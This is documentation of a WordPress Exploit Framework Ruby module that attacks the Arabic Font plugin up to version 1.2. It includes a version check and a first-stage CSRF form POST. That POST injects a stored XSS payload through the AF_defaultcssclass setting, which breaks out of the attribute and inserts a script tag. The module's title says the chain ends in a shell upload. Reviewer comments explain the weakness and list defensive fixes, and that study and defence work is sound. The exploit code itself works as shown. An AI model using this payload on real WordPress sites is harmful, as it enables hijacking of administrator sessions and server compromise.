class Wpxf::Exploit::ArabicFontCsrfStoredXssShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::StagedReflectedXss::new
# File lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb, line 6
#
# Runs the parent initializer, then registers this module's advisory metadata.
#
# The metadata is what lets a reader map the module to affected installs:
# the title scopes the issue to Arabic Font releases up to and including 1.2,
# and the references point at the WPVDB entry and the original write-up.
def initialize
  super

  credited_authors = [
    'rastating' # Discovery + WPXF module
  ]
  advisory_links = [
    ['WPVDB', '8868'],
    ['URL', 'https://www.rastating.com/arabic-font-1-2-csrf-stored-xss']
  ]

  update_info(
    name: 'Arabic Font <= 1.2 CSRF Stored XSS Shell Upload',
    author: credited_authors,
    references: advisory_links,
    date: 'Jul 18 2017'
  )
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb, line 22
#
# Version check for the Arabic Font plugin on the target site.
#
# Delegates to check_plugin_version_from_readme with the plugin slug and
# '1.2.1'. Given the module title ("<= 1.2"), '1.2.1' is presumably the first
# fixed release, which is also the version an administrator should be at or
# above. NOTE(review): confirm the meaning of the second argument and the
# return value against the helper, which is defined outside this file.
def check
  plugin_slug = 'arabic-font'
  version_bound = '1.2.1'

  check_plugin_version_from_readme(plugin_slug, version_bound)
end
initial_script()
# File lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb, line 26
#
# Builds the first-stage script: a form POST to the Arabic Font settings page
# (admin.php?page=arabic-font/inc/init.php) that saves the plugin options.
#
# What the request shows about the underlying weakness:
# * The submitted fields are only the plugin's own settings plus 'action';
#   no anti-CSRF token (WordPress nonce) field is among them, which matches
#   the "CSRF" in the module title.
# * 'AF_defaultcssclass' carries a value that closes the surrounding HTML
#   attribute and adds a <script> element, so the setting is presumably
#   stored and later rendered without output escaping. NOTE(review): the
#   rendering side is not visible here; confirm against the plugin source.
#
# Defensive takeaways: the settings handler needs nonce verification and a
# capability check, the CSS class option needs sanitising on save and
# escaping on output, and saved Arabic Font options containing quote or
# angle-bracket characters are a useful indicator when reviewing a site.
#
# Returns whatever create_basic_post_script returns for the URL and fields.
def initial_script
  settings_url = normalize_uri(wordpress_url_admin, 'admin.php?page=arabic-font%2Finc%2Finit.php')

  # Kept byte-for-byte: the escaping here is part of the module's behaviour.
  css_class_value = ".arab\\\"><script>#{xss_ascii_encoded_include_script}<\\/script><input+type=\\\"hidden\\\"+value=\\\""

  create_basic_post_script(
    settings_url,
    'save1' => 'Save changes',
    'AF_fontfamily' => 'JF Flat Jozoor',
    'AF_fontsize' => '18',
    'AF_lineheight' => '45',
    'AF_textalign' => 'Center',
    'AF_defaultcssclass' => css_class_value,
    'AF_customcss' => '',
    'action' => 'save'
  )
end